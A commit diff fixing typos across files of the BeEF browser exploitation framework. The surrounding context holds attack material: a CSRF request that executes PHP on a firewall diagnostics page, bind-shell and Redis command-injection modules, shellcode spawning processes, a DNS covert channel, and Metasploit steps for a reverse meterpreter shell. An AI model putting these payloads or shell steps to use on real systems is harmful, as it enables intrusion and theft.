Fix typos

This commit is contained in:
zinduolis
2025-11-10 20:39:51 +10:00
parent 582c4d67e3
commit cc862ae82f
20 changed files with 30 additions and 30 deletions

View File

@@ -29,7 +29,7 @@ module BeEF
#
def register(owner, clss, method, params = [])
unless verify_api_path(clss, method)
print_error "API Registrar: Attempted to register non-existant API method #{clss} :#{method}"
print_error "API Registrar: Attempted to register non-existent API method #{clss} :#{method}"
return
end

View File

@@ -38,7 +38,7 @@ module BeEF
end
#
# set teh auth_timestamp
# set the auth_timestamp
#
def set_auth_timestamp(time)
@auth_timestamp = time

View File

@@ -14307,7 +14307,7 @@ Ext.data.DataProxy.Error = Ext.extend(Ext.Error, {constructor:function (b, a) {
this.arg = a;
Ext.Error.call(this, b)
}, name:"Ext.data.DataProxy"});
Ext.apply(Ext.data.DataProxy.Error.prototype, {lang:{"action-undefined":"DataProxy attempted to execute an API-action but found an undefined url / function. Please review your Proxy url/api-configuration.", "api-invalid":"Recieved an invalid API-configuration. Please ensure your proxy API-configuration contains only the actions from Ext.data.Api.actions."}});
Ext.apply(Ext.data.DataProxy.Error.prototype, {lang:{"action-undefined":"DataProxy attempted to execute an API-action but found an undefined url / function. Please review your Proxy url/api-configuration.", "api-invalid":"Received an invalid API-configuration. Please ensure your proxy API-configuration contains only the actions from Ext.data.Api.actions."}});
Ext.data.Request = function (a) {
Ext.apply(this, a)
};

View File

@@ -14,7 +14,7 @@ module BeEF
unless @config.key?('host') || @config.key?('uri') || @config.key?('port') ||
@config.key?('user') || @config.key?('pass')
print_error 'There is not enough information to initalize Metasploit connectivity at this time'
print_error 'There is not enough information to initialize Metasploit connectivity at this time'
print_error 'Please check your options in config.yaml to verify that all information is present'
BeEF::Core::Configuration.instance.set('beef.extension.metasploit.enabled', false)
BeEF::Core::Configuration.instance.set('beef.extension.metasploit.loaded', false)
@@ -137,7 +137,7 @@ module BeEF
res = super(@config['user'], @config['pass'])
unless res
print_error '[Metasploit] Could not authenticate to Metasploit RPC sevrice.'
print_error '[Metasploit] Could not authenticate to Metasploit RPC service.'
return false
end

View File

@@ -24,7 +24,7 @@ package {
if (!this._cam) {
//Either the camera is not available or some other error has occured
//Either the camera is not available or some other error has occurred
ExternalInterface.call("naPermissions");
} else if (this._cam.muted) {

View File

@@ -165,7 +165,7 @@ search:
je found ;cmd= found
inc rbx
dec rcx
jrcxz notfound ;cmd= not in recieved buffer
jrcxz notfound ;cmd= not in received buffer
jmp search ;search some more
found:
xor rdi, rdi

View File

@@ -169,7 +169,7 @@ search:
je found ;cmd= found
inc ebx
dec ecx
jecxz notfound ;cmd= not in recieved buffer
jecxz notfound ;cmd= not in received buffer
jmp search ;search some more
found:

View File

@@ -26,7 +26,7 @@ shell:
pop ecx ; Set ECX for the loop
push_loop: ;
push esi ; push a null dword
loop push_loop ; keep looping untill we have pushed enough nulls
loop push_loop ; keep looping until we have pushed enough nulls
mov word [esp + 60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
lea eax, [esp + 16] ; Set EAX as a pointer to our STARTUPINFO Structure
mov byte [eax], 68 ; Set the size of the STARTUPINFO Structure
@@ -34,8 +34,8 @@ push_loop: ;
push esp ; Push the pointer to the PROCESS_INFORMATION Structure
push eax ; Push the pointer to the STARTUPINFO Structure
push esi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
push esi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
push esi ; We dont specify any dwCreationFlags
push esi ; The lpEnvironment is NULL so the new process will have the same environment as its parent
push esi ; We don't specify any dwCreationFlags
inc esi ; Increment ESI to be one
push esi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
dec esi ; Decrement ESI back down to zero

View File

@@ -18,7 +18,7 @@ beef.execute(function() {
process.init(lFile);
process.run(false,['/c', command_str],2);
} catch (e) {
result = "an unexpected error occured";
result = "an unexpected error occurred";
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+result);

View File

@@ -57,7 +57,7 @@ function makeCSRF(token){
// Final CSRF attack with right referer (because executed in the context)
// and with right token captured above
var response = ajax('/diag_command.php', 'POST', 'txtCommand=&txtRecallBuffer=&dlPath=&ulfile=&txtPHPCommand=' + payload + '&submit=EXECPHP&__csrf_magic=' + token);
// Finally, redirect back to the intial hooked page
// Finally, redirect back to the initial hooked page
document.location=decodeURIComponent(redir);
}

View File

@@ -48,7 +48,7 @@ class Inter_protocol_posix_bindshell < BeEF::Core::Command
{ 'name' => 'ip', 'ui_label' => 'Target Address', 'value' => 'localhost' },
{ 'name' => 'port', 'ui_label' => 'Target Port', 'value' => '4444' },
{ 'name' => 'command_timeout', 'ui_label' => 'Timeout (s)', 'value' => '30' },
{ 'name' => 'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the semicolons are required to seperate commands', 'type' => 'textarea',
{ 'name' => 'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the semicolons are required to separate commands', 'type' => 'textarea',
'value' => 'echo ID: ; id', 'width' => '200px' },
{ 'name' => 'result_size', 'ui_label' => 'Result Size', 'description' => 'Expected maximum size of the result in bytes', 'value' => '1024' }
]

View File

@@ -9,7 +9,7 @@ beef:
enable: true
category: "IPEC"
name: "Redis"
description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Redis daemon on the target specified in the 'Target Address' input field.<br/><br/>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the Redis commands are not returned to BeEF.<br/><br/>Note: Use '\\n' to seperate Redis commands and '\\\\n' for new lines."
description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Redis daemon on the target specified in the 'Target Address' input field.<br/><br/>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the Redis commands are not returned to BeEF.<br/><br/>Note: Use '\\n' to separate Redis commands and '\\\\n' for new lines."
authors: ["bcoles"]
target:
working: ["FF", "C"]

View File

@@ -10,7 +10,7 @@ class Inter_protocol_redis < BeEF::Core::Command
{ 'name' => 'rhost', 'ui_label' => 'Target Address', 'value' => '127.0.0.1' },
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '6379' },
{ 'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15' },
{ 'name' => 'commands', 'ui_label' => 'Redis commands', 'description' => "Enter Redis commands to execute. Note: Use '\\n' to seperate Redis commands and '\\\\n' for new lines.",
{ 'name' => 'commands', 'ui_label' => 'Redis commands', 'description' => "Enter Redis commands to execute. Note: Use '\\n' to separate Redis commands and '\\\\n' for new lines.",
'type' => 'textarea', 'value' => cmd, 'width' => '200px' }
]
end

View File

@@ -9,7 +9,7 @@ beef:
enable: true
category: "IPEC"
name: "Bindshell (Windows)"
description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field.<br/><br/>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: ampersands are required to seperate commands."
description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field.<br/><br/>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: ampersands are required to separate commands."
authors: ["bcoles", "wade"]
target:
working: ["FF", "C"]

View File

@@ -15,7 +15,7 @@ class Inter_protocol_win_bindshell < BeEF::Core::Command
{ 'name' => 'rhost', 'ui_label' => 'Target Address', 'value' => '127.0.0.1' },
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '4444' },
{ 'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '30' },
{ 'name' => 'commands', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: ampersands are required to seperate commands', 'type' => 'textarea',
{ 'name' => 'commands', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: ampersands are required to separate commands', 'type' => 'textarea',
'value' => 'echo User: & whoami & echo Directory Path: & pwd & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width' => '200px' }
]
end

View File

@@ -5,14 +5,14 @@
//
/*
This JavaScript retreives data from a server via DNS covert channel.
This JavaScript retrieves data from a server via DNS covert channel.
A remote controlled domain with a custom DNS server implementing covert channel logic is required.
BeEF supports this feature via Server-to-Client DNS Tunnel extension.
The initial concept of the DNS covert channell and its implementation are described in the following literature:
The initial concept of the DNS covert channel and its implementation are described in the following literature:
- K.Born. Browser-Based Covert Data Exfiltration. http://arxiv.org/ftp/arxiv/papers/1004/1004.4357.pdf
- W. Alkorn,C. Frichot, M.Orru. The Browser Hacker's Handbook. ISBN-13: 978-1118662090, ISBN-10: 1118662091
- W. Alcorn,C. Frichot, M.Orru. The Browser Hacker's Handbook. ISBN-13: 978-1118662090, ISBN-10: 1118662091
*/
beef.execute(function() {
@@ -29,7 +29,7 @@ beef.execute(function() {
var bit_transfered = new Array();
var timing = new Array();
// Do the DNS query by reqeusting an image
// Do the DNS query by requesting an image
send_query = function(fqdn, msg, byte, bit) {
var img = new Image;
var fport = "";
@@ -51,7 +51,7 @@ beef.execute(function() {
}
};
// Construct DNS names based on Active Directory SRV resource records pattern and resolv them via send_query function
// Construct DNS names based on Active Directory SRV resource records pattern and resolve them via send_query function
// See http://technet.microsoft.com/en-us/library/cc961719.aspx
function get_byte(msg, byte) {
bit_transfered[msg][byte] = 0;
@@ -71,7 +71,7 @@ beef.execute(function() {
}
}
// Construct random sring
// Construct random string
function getRandomStr(n){
return Math.random().toString(36).slice(2, 2 + Math.max(1, Math.min(n, 12)));
}

View File

@@ -9,7 +9,7 @@ beef:
enable: true
category: "IPEC"
name: "DNS Tunnel: Server-to-Client"
description: "This module retreives data sending by server over DNS covert channel (DNS tunnel).<br/><br/> A payload name and message are taken as input. The message is sent as a bitstream, decoded, and then can be accessed via Window object property specified in payload name parameter.<br/><br/>Note: To use this feature you should enable S2C DNS Tunnel extension."
description: "This module retrieves data sent by the server over DNS covert channel (DNS tunnel).<br/><br/> A payload name and message are taken as input. The message is sent as a bitstream, decoded, and then can be accessed via Window object property specified in payload name parameter.<br/><br/>Note: To use this feature you should enable S2C DNS Tunnel extension."
authors: ["dnkolegov"]
target:
working: "All"

View File

@@ -10,7 +10,7 @@ beef.execute(function() {
var anchorsToCheck = '<%= @anchorsToCheck %>';
var arrayOfAnchorsToCheck = [];
//the anchors should be seperated with ','
//the anchors should be separated with ','
//remove tabs, newlines, carriage returns and spaces
anchorsToCheck = anchorsToCheck.replace(/[ \t\r\n]/g,'');
arrayOfAnchorsToCheck = anchorsToCheck.split(',');
@@ -61,7 +61,7 @@ beef.execute(function() {
poll();
}
else {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'time-out occured!');
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'time-out occurred!');
}
}, 100);
};

View File

@@ -69,7 +69,7 @@ beef.execute(function() {
BIGipCookieValue = m[0].split('=')[1];
result = 'BigIP_cookie_name=' + BIGipCookieName;
// Retreive pool name via cookie name
// Retrieve pool name via cookie name
if (BIGipCookieName.match(/^BIGipServer/) !== null) {
poolName = BIGipCookieName.split('BIGipServer')[1];
result += '&pool_name=' + poolName;
@@ -84,6 +84,6 @@ beef.execute(function() {
backend = f5CookieDecode(BIGipCookieValue);
result += '&host=' + backend.host + '&port=' + backend.port;
}
else result = 'result=BigIP coookie not found'
else result = 'result=BigIP cookie not found'
beef.net.send('<%= @command_url %>', <%= @command_id %>, result);
});

View File

@@ -9,7 +9,7 @@ beef:
enable: true
category: ["Social Engineering"]
name: "SiteKiosk Breakout"
description: "This Module breaks out of SiteKiosk by using HTA. The HTA closes the kiosk and starts a reverse meterpreter shell via a powershell payload!<br>Before launching the module, do the following on Metasploit:<br>use exploit/windows/misc/psh_web_delivery<br>set URIPATH /psh<br>set PAYLOAD windows/meterpreter/reverse_https<br>set LHOST x.x.x.x<br>set LPORT 443<br>set ExitOnSession false<br>set AutoRunScript post/windows/manage/smart_migrate<br>exploit -j -z<br><br>After executing the module, follow this steps:<br>Click Save<br>Enter shell:ProgramFiles in the Save Dialogs adressbar<br>Navigate to C:\\Users\\Public\\Downloads<br>Save the file<br>After the Download is finished click on execute<br>Profit"
description: "This Module breaks out of SiteKiosk by using HTA. The HTA closes the kiosk and starts a reverse meterpreter shell via a powershell payload!<br>Before launching the module, do the following on Metasploit:<br>use exploit/windows/misc/psh_web_delivery<br>set URIPATH /psh<br>set PAYLOAD windows/meterpreter/reverse_https<br>set LHOST x.x.x.x<br>set LPORT 443<br>set ExitOnSession false<br>set AutoRunScript post/windows/manage/smart_migrate<br>exploit -j -z<br><br>After executing the module, follow this steps:<br>Click Save<br>Enter shell:ProgramFiles in the Save Dialogs address bar<br>Navigate to C:\\Users\\Public\\Downloads<br>Save the file<br>After the Download is finished click on execute<br>Profit"
authors: ["insertscript"]
target:
user_notify: ["IE"]